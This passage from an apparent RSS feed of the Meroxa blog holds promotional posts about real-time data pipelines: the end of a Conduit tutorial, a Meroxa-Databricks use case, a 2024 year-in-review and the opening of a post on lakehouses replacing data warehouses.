  &quot;payload&quot;: {
    &quot;before&quot;: null,
    &quot;after&quot;: {
      &quot;airline&quot;: &quot;wheelmaker&quot;,
      &quot;scheduledDeparture&quot;: &quot;2024-11-05T10:06:34.148469Z&quot;
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The JSON object you see is the &lt;a href=&quot;https://conduit.io/docs/using/opencdc-record&quot;&gt;OpenCDC record&lt;/a&gt; that holds the data being streamed as well as other data and metadata. In the &lt;code class=&quot;language-text&quot;&gt;.payload.after&lt;/code&gt; field you will see the user data that was generated by the &lt;code class=&quot;language-text&quot;&gt;generator&lt;/code&gt; connector:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;json&quot;&gt;&lt;pre class=&quot;language-json&quot;&gt;&lt;code class=&quot;language-json&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;airline&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;wheelmaker&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;scheduledDeparture&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2024-11-05T10:06:34.148469Z&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The pipeline will keep streaming the data from the generator source connector to the file destination connector as long as Conduit is running. To stop Conduit, press &lt;code class=&quot;language-text&quot;&gt;Ctrl + C&lt;/code&gt; (on a Linux OS, or the equivalent on other operating systems). This will trigger a graceful shutdown that stops reads from source connectors and waits for records that are still in the pipeline to be acknowledged. The next time Conduit starts, it will start reading data from where it stopped.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Building a real-time pipeline with Meroxa’s Conduit OSS is straightforward, even for beginners. By following this guide, you’ve set up a reliable and scalable pipeline that delivers real-time insights. Ready to explore more? Check out Conduit’s &lt;a href=&quot;https://conduit.io/docs&quot;&gt;documentation&lt;/a&gt; for advanced configurations and integrations.&lt;/p&gt;
&lt;p&gt;Start building your data pipelines today and unlock the potential of real-time data! For more information on our managed platform options &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;request a demo.&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Solution Use Case: Accelerating AI/ML Success with Meroxa and Databricks]]></title><description><![CDATA[This blog highlights how integrating Meroxa for real-time data ingestion and Databricks for scalable processing transforms AI/ML workflows. This solution reduces data latency to under 30 seconds, accelerates model training from 48 to 6 hours, and boosts prediction accuracy by 23%. With automated pipelines and end-to-end integration, businesses save time, scale efficiently, and achieve tangible outcomes like improved customer engagement and increased revenue from real-time insights.]]></description><link>https://meroxa.com/blog/solution-use-case-accelerating-aiml-success-with-meroxa-and-databricks</link><guid isPermaLink="false">https://meroxa.com/blog/solution-use-case-accelerating-aiml-success-with-meroxa-and-databricks</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Fri, 10 Jan 2025 13:18:00 GMT</pubDate><content:encoded>&lt;h3&gt;&lt;strong&gt;Overview&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Organizations facing real-time data challenges can achieve &lt;strong&gt;up to 25% cost savings&lt;/strong&gt; on data pipeline management while accelerating model training, improving prediction accuracy, and enhancing operational efficiency. By integrating &lt;strong&gt;Meroxa&lt;/strong&gt; for seamless data movement with &lt;strong&gt;Databricks&lt;/strong&gt; for scalable data processing and analytics, organizations transform their data infrastructure to meet the demands of modern AI/ML workflows.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;The Challenge: Delayed Data Access and Siloed Systems&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;AI/ML models rely on timely, high-quality data to deliver accurate predictions and drive meaningful business outcomes. However, many organizations encounter the following issues:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Delayed Data Access&lt;/strong&gt;: Data from critical systems—such as customer interactions, transaction logs, or marketing campaign metrics—is often processed in nightly batches. This delay results in models trained on outdated data, reducing relevance and predictive accuracy.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Siloed Systems&lt;/strong&gt;: Data resides in disparate sources like Postgres databases, Kafka event streams, and third-party platforms. Integrating these sources involves manual workflows and complex ETL processes that introduce delays and potential errors.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Slow Model Development&lt;/strong&gt;: Preparing data for ML workflows is time-consuming, often taking &lt;strong&gt;2-3 days per iteration&lt;/strong&gt;, slowing experimentation and innovation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Business Impact&lt;/strong&gt;: The lack of real-time insights impacts customer engagement and revenue. For example, abandoned carts increase, conversion rates stagnate, and opportunities for personalization are missed.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;The Solution: Integration of Meroxa and Databricks&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dalle-2025-01-10-11.07.48-data-integration.png&quot; alt=&quot;DALLE 2025-01-10 11.07.48 - data integration.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;To overcome these challenges, the combination of &lt;strong&gt;Meroxa&lt;/strong&gt; and &lt;strong&gt;Databricks&lt;/strong&gt; offers a modern, automated solution for real-time data ingestion, processing, and analytics.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Data Ingestion with Meroxa&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Meroxa enables seamless, real-time ingestion of data from Postgres, Kafka, and APIs into an integrated pipeline.&lt;/li&gt;
&lt;li&gt;Its &lt;strong&gt;developer-friendly platform&lt;/strong&gt; allows engineering teams to build pipelines in hours rather than days.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Key Benefit&lt;/strong&gt;: Reduce data latency from &lt;strong&gt;24 hours to under 30 seconds&lt;/strong&gt;, ensuring immediate availability for ML models.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Unified Data Processing in Databricks&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Data from multiple sources is consolidated into &lt;strong&gt;Delta Lake&lt;/strong&gt;, ensuring consistency and enabling low-latency querying.&lt;/li&gt;
&lt;li&gt;Databricks’ scalable environment processes &lt;strong&gt;billions of daily events&lt;/strong&gt; efficiently, even during peak loads.&lt;/li&gt;
&lt;li&gt;Feature engineering is streamlined, supporting the creation of &lt;strong&gt;50+ model features&lt;/strong&gt; without manual intervention.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;End-to-End Pipeline Automation&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Integration between Meroxa and Databricks automates the entire data pipeline, eliminating manual ETL processes.&lt;/li&gt;
&lt;li&gt;Real-time monitoring and observability tools help reduce troubleshooting time by &lt;strong&gt;40%&lt;/strong&gt;, ensuring data reliability.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;The Results: Faster Insights and Enhanced Predictions&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dalle-2025-01-10-11.14.39-automated-pipelines.png&quot; alt=&quot;DALLE 2025-01-10 11.14.39 - automated pipelines.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Organizations implementing the Meroxa-Databricks solution realize measurable outcomes, including:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Accelerated Model Training&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;ML training cycles shrink from &lt;strong&gt;48 hours to 6 hours&lt;/strong&gt;, enabling faster deployment and iteration of AI models.&lt;/li&gt;
&lt;li&gt;Teams can deploy &lt;strong&gt;10% more models per quarter&lt;/strong&gt;, enhancing agility and innovation.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improved Prediction Accuracy&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Access to real-time, high-quality data improves model accuracy by &lt;strong&gt;23%&lt;/strong&gt;, boosting customer engagement.&lt;/li&gt;
&lt;li&gt;Applications like product recommendations experience a &lt;strong&gt;35% increase in click-through rates (CTR)&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Operational Efficiency Gains&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Automated workflows save &lt;strong&gt;30+ hours per week&lt;/strong&gt; for engineering teams, allowing them to focus on strategic initiatives.&lt;/li&gt;
&lt;li&gt;Integration costs decrease by &lt;strong&gt;25%&lt;/strong&gt; compared to batch-based ETL processes.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability for Growth&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;The system seamlessly scales to handle &lt;strong&gt;2x data volume growth&lt;/strong&gt; without additional infrastructure investment.&lt;/li&gt;
&lt;li&gt;Adding new data sources is streamlined, requiring less than a week for integration.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Business Impact&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Conversion rates increase by &lt;strong&gt;15%&lt;/strong&gt;, and abandoned cart rates drop by &lt;strong&gt;12%&lt;/strong&gt;, driving immediate ROI.&lt;/li&gt;
&lt;li&gt;Revenue from personalized insights grows by millions annually due to enhanced prediction accuracy and real-time availability.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Key Benefits&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Meroxa&lt;/strong&gt;: Provides real-time, reliable data ingestion with developer-focused tools, reducing latency and manual intervention.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Databricks&lt;/strong&gt;: Delivers scalable, unified data processing and analytics, enabling organizations to build and deploy AI models efficiently.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Synergy&lt;/strong&gt;: Together, they create a powerful, automated pipeline solution that supports rapid AI/ML workflows, real-time insights, and business scalability.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Meroxa and Databricks integration transforms how organizations approach AI/ML workflows. By eliminating data silos, reducing latency, and automating pipelines, this solution delivers faster, more accurate insights that drive tangible business outcomes.&lt;/p&gt;
&lt;p&gt;Ready to unlock your data’s full potential? &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Get started with Meroxa today&lt;/a&gt;!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Meroxa’s 2024 Year in Review: Big Wins and a Bright Future in AI]]></title><description><![CDATA[Discover how Meroxa revolutionized real-time data integration in 2024 with powerful new connectors, including Amazon DynamoDB, Snowflake, Apache Kafka, and more, enabling seamless data movement across diverse systems. This blog highlights key updates to the Conduit Platform, such as pipeline recovery features in Conduit v0.12.0 and schema registry support in Conduit Operator v0.0.2, designed to enhance resilience and simplify Kubernetes deployments. We also dive into a compelling case study featuring a global hotel network that leveraged Meroxa’s platform to integrate customer data, boosting guest satisfaction by 30% and increasing revenue per available room by 20%. Whether you're building robust data pipelines, enabling real-time analytics, or driving AI-powered transformations, explore how Meroxa’s latest advancements are unlocking new possibilities for developers and data teams.]]></description><link>https://meroxa.com/blog/meroxas-2024-year-in-review-big-wins-and-a-bright-future-in-ai</link><guid isPermaLink="false">https://meroxa.com/blog/meroxas-2024-year-in-review-big-wins-and-a-bright-future-in-ai</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Tue, 31 Dec 2024 09:25:00 GMT</pubDate><content:encoded>&lt;p&gt;As 2024 draws to a close, we’re taking a moment to reflect on an incredible year at Meroxa. From groundbreaking advancements in our Conduit Platform to new AI-powered innovations, this year has been nothing short of transformative. Here’s a look back at our key wins and a glimpse into what 2025 has in store as we continue to lead the charge in the data movement and AI landscape.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2024 Highlights&lt;/strong&gt;&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;1. Expanding the Boundaries of Real-Time Data Movement&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_real_time_data_movement.png&quot; alt=&quot;dkeeton_17415_real_time_data_movement.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;In 2024, we empowered organizations to move data faster and more efficiently than ever before. Leveraging the power of our Conduit Platform, businesses built real-time pipelines that drive instant decision-making, fueling everything from fintech applications to personalized customer experiences. Notably, we enhanced Conduit with key features like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Conduit Platform Enhancements&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conduit v0.10 – Multiple Collections Support&lt;/strong&gt; (April 29, 2024): This release introduced multiple collections support, enhancing the platform’s ability to handle diverse data integration scenarios. The update aimed to improve efficiency, security, and performance for data operations.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conduit Platform by Meroxa&lt;/strong&gt; (June 18, 2024): Meroxa launched the Conduit Platform, bringing a host of new features and improvements designed to enhance real-time data streaming experiences. Powered by the robust Conduit open-source core, this transformation offers enhanced performance, scalability, and usability, along with access to over 100 connectors maintained by the open-source community.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conduit v0.11 – Schema Support&lt;/strong&gt; (August 19, 2024): This version focused on adding schema support, enabling users to detect schema changes and retain type information end-to-end. This enhancement streamlines data integration processes, improving efficiency and performance.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conduit v0.12.0 – Pipeline Recovery&lt;/strong&gt; (October 11, 2024): This release introduced pipeline recovery features designed to automatically restart pipelines experiencing temporary errors, such as network interruptions or service downtime. With configurable backoff settings, Conduit efficiently handles retries, reducing the impact of transient issues and ensuring continuous data flow.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conduit Operator v0.02 – Schema Registry Support&lt;/strong&gt; (October 24, 2024): The updated Conduit Operator now includes built-in schema registry support, allowing seamless data encoding and decoding. This enhancement improves data compatibility across pipelines, ensuring smoother and more reliable handling of complex data flows.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These product releases reflect Meroxa’s commitment to providing cutting-edge tools for real-time data integration and processing, empowering organizations to build efficient and scalable data pipelines.&lt;/p&gt;
&lt;p&gt;For more detailed information on these releases, visit Meroxa’s &lt;a href=&quot;https://meroxa.com/blog/&quot;&gt;blog&lt;/a&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;New Connectors and Integration Tools&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conduit Connector for Apache Flink&lt;/strong&gt; (June 17, 2024): Meroxa introduced a Conduit connector for Apache Flink, combining Flink’s robust stream processing capabilities with Conduit’s lightweight and fast data streaming solution. This integration simplifies the creation of connectors, expanding Flink’s capabilities.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;HTTP Connector for Conduit&lt;/strong&gt; (April 12, 2024): The new HTTP Connector enhances data integration by facilitating seamless communication with any API endpoint. This tool is designed for developers and enterprises looking to streamline data workflows and maximize connectivity.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Amazon DynamoDB (Beta)&lt;/strong&gt;: Enabled real-time data streaming from Amazon DynamoDB, allowing users to integrate NoSQL data into their pipelines.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Amazon Redshift (Developer Preview):&lt;/strong&gt; Introduced support for Amazon Redshift, facilitating data movement to and from this popular data warehousing service.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Apache Kafka (Developer Preview):&lt;/strong&gt; Provided integration with Apache Kafka, enabling high-throughput, low-latency data streaming capabilities.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Microsoft SQL Server (Developer Preview):&lt;/strong&gt; Added support for Microsoft SQL Server, allowing seamless data integration with this widely used relational database.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MongoDB (Developer Preview):&lt;/strong&gt; Enabled real-time data streaming to and from MongoDB, supporting flexible, document-oriented data structures.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MySQL (Developer Preview):&lt;/strong&gt; Introduced integration with MySQL, facilitating real-time data movement for this popular open-source relational database.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PostgreSQL (Developer Preview):&lt;/strong&gt; Provided support for PostgreSQL, enabling efficient data streaming with this advanced open-source relational database.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Snowflake (Developer Preview):&lt;/strong&gt; Enabled integration with Snowflake, allowing users to stream data into this cloud-based data warehousing platform.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These connector releases have been instrumental in broadening the Conduit Platform’s integration capabilities, allowing users to connect a diverse range of data sources and destinations seamlessly. For a comprehensive list of available connectors and their current statuses, please visit Meroxa’s &lt;a href=&quot;https://meroxa.com/connectors/&quot;&gt;Connectors&lt;/a&gt; Page.&lt;/p&gt;
&lt;p&gt;For the most up-to-date information on connector availability and platform features, please refer to Meroxa’s official &lt;a href=&quot;https://github.blog/changelog/&quot;&gt;Changelog&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2. Accelerating AI Innovation&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_black_data_ai_innovation.png&quot; alt=&quot;dkeeton_17415_black_data_ai_innovation.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;2024 was the year of AI, and Meroxa took the lead by integrating AI functionalities into the Conduit Platform. Highlights include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Real-Time AI Inference Pipelines&lt;/strong&gt;: Enabling businesses to operationalize AI insights faster than ever.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Fintech-Specific AI Solutions&lt;/strong&gt;: Supporting fintech companies in fraud detection, credit scoring, and personalized finance tools, making AI both accessible and impactful in highly regulated industries.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These advancements positioned Meroxa as a trusted partner for organizations looking to operationalize AI at scale.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;3. Transforming the Hospitality Industry: A Customer Success Story&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_transforming_hospitality_industry.png&quot; alt=&quot;dkeeton_17415_transforming_hospitality_industry.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;One of our most exciting achievements in 2024 was helping The Hotels Network (THN) revolutionize their data integration processes. Facing challenges with siloed data between their sales and support teams, THN partnered with Meroxa to streamline their data flow using our Conduit Platform. By creating a unified, real-time pipeline from Salesforce to Redpanda, THN achieved significant improvements in operational efficiency and customer support capabilities.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;The Meroxa team worked with us to design, build &amp;#x26; deploy an efficient low-code solution to connect our Salesforce org with our internal backend system via the Redpanda streaming platform.&quot;&lt;/p&gt;
&lt;p&gt;– &lt;strong&gt;David Sanchez Carmona, Senior GTM Systems Manager, The Hotels Network&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This collaboration exemplifies the transformative impact of Meroxa’s platform in addressing complex data challenges across industries.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;4. Supporting the Defense Sector with Real-Time Data&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_defense_sector_support.png&quot; alt=&quot;dkeeton_17415_defense_sector_support.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;In 2024, Meroxa’s Conduit Platform played a critical role in supporting defense organizations by enabling real-time data movement and analysis for mission-critical operations. With increasing demands for secure, high-speed data processing, the defense sector turned to Meroxa for solutions that prioritize reliability and compliance.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key achievements include:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Real-Time Threat Detection:&lt;/strong&gt; Defense organizations used Conduit to process vast amounts of sensor and satellite data, identifying threats in real time.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Improved Decision-Making&lt;/strong&gt;: AI-powered insights enabled defense teams to act on critical intelligence faster and with greater accuracy.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Secure and Compliant Pipelines&lt;/strong&gt;: The Conduit Platform met stringent security requirements, ensuring compliance with defense industry regulations.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;“Meroxa’s technology has become indispensable to our operations. The speed and reliability of their platform allow us to process data in real time, which is essential for maintaining situational awareness and ensuring mission success.”&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;– &lt;strong&gt;Director of Data Operations, Leading Defense Agency&lt;/strong&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;4. SOC 2 Certification: A Commitment to Security&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_soc_2_compliance.png&quot; alt=&quot;dkeeton_17415_soc_2_compliance.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Security is non-negotiable in today’s data-driven world, and we’re proud to have achieved &lt;strong&gt;SOC 2 certification&lt;/strong&gt; this year. This milestone underscores our commitment to delivering a platform that meets the highest standards of security and trust.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;5. Community and Ecosystem Growth&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_data_community_and_ecosystem_growth.png&quot; alt=&quot;dkeeton_17415_data_community_and_ecosystem_growth.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Meroxa’s community grew exponentially in 2024, with thousands of developers and data professionals leveraging our platform. Events like &lt;strong&gt;#AstroWeek&lt;/strong&gt; and our hands-on workshops around building &lt;strong&gt;real-time analytics dashboards&lt;/strong&gt; using &lt;strong&gt;Postgres, ClickHouse, and Grafana&lt;/strong&gt; were met with overwhelming participation.&lt;/p&gt;
&lt;p&gt;Our partnerships also expanded to include leading data and AI ecosystems, making Meroxa a critical piece of the modern data stack for organizations around the globe.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Looking Ahead to 2025&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_data_2025_look_ahead.png&quot; alt=&quot;dkeeton_17415_data_2025_look_ahead.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;As we enter 2025, we’re doubling down on AI and data movement innovation. Here’s what’s on the horizon:&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;1. AI-Powered Platform Enhancements&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Next year, we’re launching a suite of AI-driven tools designed to further simplify and enhance data engineering workflows. Expect features like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Intelligent Pipeline Recommendations&lt;/strong&gt;: AI-powered insights to optimize pipeline performance and reduce costs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Proactive Anomaly Detection&lt;/strong&gt;: Real-time identification of data issues to ensure reliability.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Expanded AI Integrations&lt;/strong&gt;: Seamless connectivity with cutting-edge AI platforms to supercharge your workflows.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2. Democratizing Real-Time AI for All&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;We believe the future of AI should be accessible to every organization, regardless of size. In 2025, Meroxa will unveil &lt;strong&gt;entry-level pricing models&lt;/strong&gt; and self-serve options to help small businesses harness the power of real-time AI insights.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;3. Deeper Vertical Specialization&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Building on our success in fintech, we’ll expand AI-driven solutions for other key industries, including healthcare, e-commerce, and logistics. This will include tailored use cases like real-time supply chain optimization and personalized healthcare insights.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;4. Continued Commitment to Sustainability&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;As part of our sustainability initiative, we’re working to reduce the environmental impact of data movement. Look for updates in 2025 as we optimize our platform for energy-efficient operations, ensuring real-time data movement is not just fast but also green.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Thank You for an Amazing 2024&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_data_fireworks.png&quot; alt=&quot;dkeeton_17415_data_fireworks.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;To our customers, partners, and the broader data community—thank you for making 2024 a year to remember. Your trust and innovation drive everything we do. As we look toward 2025, we’re excited to continue building a future where real-time data movement and AI empower every organization to achieve their boldest goals.&lt;/p&gt;
&lt;p&gt;Stay tuned for more updates, and here’s to a groundbreaking year ahead! If you are looking to learn more now…..&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Sign up&lt;/a&gt;!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;The Meroxa Team&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Why the Lakehouse Is Replacing the Outdated Data Warehouse for Real-Time Streaming]]></title><description><![CDATA[Traditional data warehouses, long the cornerstone of analytics, are increasingly ill-equipped to meet the demands of today’s real-time, dynamic data needs. Enter the Lakehouse: an innovative architecture that blends the flexibility of data lakes with the robust querying capabilities of warehouses, seamlessly handling structured and unstructured data for real-time analytics. This blog explores the shortcomings of legacy systems, the transformative benefits of Lakehouses, and how Meroxa simplifies the journey with its intuitive tools, real-time data pipelines, and cloud-native scalability. From leveraging cutting-edge technologies like Apache Iceberg and Delta Lake to providing expert migration support, Meroxa empowers organizations to unlock faster, more flexible insights without the complexity or high costs of traditional solutions.]]></description><link>https://meroxa.com/blog/why-the-lakehouse-is-replacing-the-outdated-data-warehouse-for-real-time-streaming</link><guid isPermaLink="false">https://meroxa.com/blog/why-the-lakehouse-is-replacing-the-outdated-data-warehouse-for-real-time-streaming</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Fri, 20 Dec 2024 07:28:00 GMT</pubDate><content:encoded>&lt;p&gt;Data warehouses have been at the heart of analytics for decades, helping organizations make sense of their data. While these systems excel at handling static, structured datasets, they struggle to meet the dynamic needs of today&apos;s data-driven teams—especially when it comes to real-time streaming data.&lt;/p&gt;
&lt;p&gt;That&apos;s where the Lakehouse comes in. Think of it as the best of both worlds: it combines data lakes&apos; flexibility with traditional warehouses&apos; powerful querying capabilities. This innovative architecture easily handles dynamic, unstructured, and semi-structured data, making real-time analytics a breeze.&lt;/p&gt;
&lt;p&gt;At &lt;strong&gt;Meroxa&lt;/strong&gt;, we&apos;re here to be your trusted partner in this journey. We know that embracing new technology can feel like a big step, so we&apos;ve created friendly tools and services to make your transition to the Lakehouse smooth and worry-free. Let&apos;s explore together why Lakehouses are the future and how Meroxa can help you get there.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Let&apos;s Talk About Why Data Warehouses Are Holding You Back&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_picture_of_data_warehouse_architecture2.png&quot; alt=&quot;dkeeton_17415_picture_of_data_warehouse_architecture2.png&quot;&gt;
&lt;strong&gt;1. Stuck in the Batch Processing Stone Age&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Look, I hate to break it to you, but data warehouses are living in the past. They were brilliant for their time, but trying to handle today&apos;s lightning-fast data streams with batch processing? That&apos;s like trying to drink from a fire hose with a coffee cup. Are those ETL pipelines you&apos;re using? They&apos;re turning your real-time data into yesterday&apos;s news.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. The Money Pit of Scaling&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Here&apos;s an uncomfortable truth: scaling your data warehouse for streaming is probably costing you a small fortune. Those proprietary solutions aren&apos;t just expensive—they&apos;re highway robbery. And let&apos;s be honest about resource provisioning: you&apos;re either wasting money on unused capacity or crossing your fingers hoping your system doesn&apos;t crash during peak times. Neither is a great look, right?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Square Peg, Round Hole: The Structured Data Dilemma&lt;/strong&gt;&lt;/p&gt;
